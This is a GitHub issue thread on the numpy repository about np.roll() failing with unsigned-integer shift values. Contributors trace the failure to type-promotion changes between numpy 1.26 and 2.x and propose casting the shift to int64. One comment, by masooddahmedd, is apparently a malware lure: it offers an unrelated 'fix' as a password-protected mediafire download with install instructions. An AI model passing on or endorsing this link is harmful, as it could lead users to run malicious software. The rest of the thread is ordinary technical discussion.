### ISSUE TITLE
BUG: numpy.roll() does not work with unsigned shift value

### ISSUE THREAD

**Issue by epmojo** [numpy/numpy#27282] opened 2024-08-26 19:05 UTC
### Describe the issue:

Calling numpy.roll() will raise an unexpected exception if the shift argument is an unsigned int or a tuple with an unsigned int.

This issue occurs with numpy v2.0.1 and 2.1.0, but does not occur on numpy 1.26.4 (edit: does not with a uint64, but works with other unsigned int types).

### Reproduce the code example:

```python
import numpy as np

x = np.arange(10)
y = np.roll(x, np.uint64(1)) # raises an exception
```

### Error message:

```shell
C:\Python312-64\Lib\site-packages\numpy\_core\numeric.py:1282: RuntimeWarning: overflow encountered in scalar negative
  rolls[ax] = ((slice(None, -offset), slice(offset, None)),
C:\Python312-64\Lib\site-packages\numpy\_core\numeric.py:1283: RuntimeWarning: overflow encountered in scalar negative
  (slice(-offset, None), slice(None, offset)))
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "C:\Python312-64\Lib\site-packages\numpy\_core\numeric.py", line 1265, in roll
    return roll(a.ravel(), shift, 0).reshape(a.shape)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python312-64\Lib\site-packages\numpy\_core\numeric.py", line 1288, in roll
    result[res_index] = a[arr_index]
    ~~~~~~^^^^^^^^^^^
ValueError: could not broadcast input array from shape (10,) into shape (9,)
```

### Python and NumPy Versions:

Python: 3.12.5 (tags/v3.12.5:ff3bc82, Aug  6 2024, 20:45:27) [MSC v.1940 64 bit (AMD64)]
Numpy: 2.1.0

**Comment by masooddahmedd** [comment] 2024-08-26 19:11
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by eendebakpt** [comment] 2024-08-27 20:27
For me the example above also gives an error on numpy 1.26.4. The code from `np.roll` contains:
```
        shifts = {ax: 0 for ax in range(a.ndim)}
        for sh, ax in broadcasted:
            shifts[ax] += sh
```
The `sh` is the argument `shift` passed to `np.roll`. In numpy 1.26.4 we then increment 0 (python int) with the shift (`np.uint64`), which results in a `np.float64` which cannot be used for indexing. In numpy 2.0 the promotion rules are different and `0 += np.uint64` results in a `np.uint64` which gives problems because `np.uint64` is unsigned.

The expression `y = np.roll(x, np.int64(1))` does work for me.

@epmojo Could you double check that the example code works for numpy 1.26.4?

It is not yet clear to me whether this is a regression or a feature request.

**Comment by epmojo** [comment] 2024-08-27 21:40
Okay, so it looks like 1.26.4 works with uint8, uint16, and uint32, but fails with a uint64.  I think I actually only tested with a uint16 on that version.

Test code:

```
import numpy as np

x = np.arange(10)

shifts = (np.uint8(1), np.uint16(1), np.uint16(1), np.uint32(1), np.uint64(1))
for shift in shifts:
    try:
        y = np.roll(x, shift)
    except Exception as exc:
        print(type(shift), ": Error")
        print(exc)
    else:
        print(type(shift), ":", y)
```


Here's 1.26.4 output:
```
<class 'numpy.uint8'> : [9 0 1 2 3 4 5 6 7 8]
<class 'numpy.uint16'> : [9 0 1 2 3 4 5 6 7 8]
<class 'numpy.uint16'> : [9 0 1 2 3 4 5 6 7 8]
<class 'numpy.uint32'> : [9 0 1 2 3 4 5 6 7 8]
<class 'numpy.uint64'> : Error
slice indices must be integers or None or have an __index__ method
```

Here's 2.1.0 output:
```
C:\Python312\Lib\site-packages\numpy\_core\numeric.py:1282: RuntimeWarning: overflow encountered in scalar negative
  rolls[ax] = ((slice(None, -offset), slice(offset, None)),
C:\Python312\Lib\site-packages\numpy\_core\numeric.py:1283: RuntimeWarning: overflow encountered in scalar negative
  (slice(-offset, None), slice(None, offset)))
<class 'numpy.uint8'> : Error
could not broadcast input array from shape (10,) into shape (9,)
<class 'numpy.uint16'> : Error
could not broadcast input array from shape (10,) into shape (9,)
<class 'numpy.uint16'> : Error
could not broadcast input array from shape (10,) into shape (9,)
<class 'numpy.uint32'> : Error
could not broadcast input array from shape (10,) into shape (9,)
<class 'numpy.uint64'> : Error
could not broadcast input array from shape (10,) into shape (9,)
```

**Comment by eendebakpt** [comment] 2024-08-28 12:17
Ok, for numpy 1.26.4 the following is happening: for `np.uint64` addition to python int `0` results in a float, which causes the error. A minimal example:
```
import numpy as np
shifts = {0: 0}
for sh in [np.uint8(1), np.uint32(1), np.uint64(1)]:
    x = 1
    print(f'{x=} {type(x)=}')
    x+= sh
    print(f'{x=} {type(x)=}')
```
Output
```
x=1 type(x)=<class 'int'>
x=2 type(x)=<class 'numpy.int32'>
x=1 type(x)=<class 'int'>
x=2 type(x)=<class 'numpy.int64'>
x=1 type(x)=<class 'int'>
x=2.0 type(x)=<class 'numpy.float64'>
```

Note that the documentation of `np.roll` states that the input for `shift` should be of type int (and not unsigned). So even though there is a regression from 1.26 to 2.0 in functionality, I am not sure this should be fixed. Although having a better error message would be helpful.

**Comment by ngoldbaum** [comment] 2024-08-28 19:45
> Note that the documentation of np.roll states that the input for shift should be of type int (and not unsigned).

Would it be problematic to coerce unsigned ints to signed int? Seems friendlier to just do the right thing if the user hands us an unsigned int.

**Comment by eendebakpt** [comment] 2024-08-28 20:19
Adding `shift = np.asarray(shift, dtype=np.int64)` to the start of `np.roll` would work for most of the cases I think. It will fail for the very extreme case of `np.roll(x, 2**63+1)`, but maybe that is acceptable.

@ngoldbaum Is there a dedicated numpy method to cast types to signed?

**Comment by mattip** [comment] 2024-09-18 18:41
> very extreme case of `np.roll(x, 2**63+1)`, but maybe that is acceptable

Sounds right. Would you like to submit a PR with a few tests?

**Closed** 2024-09-21 18:16 UTC
Labels: 00 - Bug, 06 - Regression
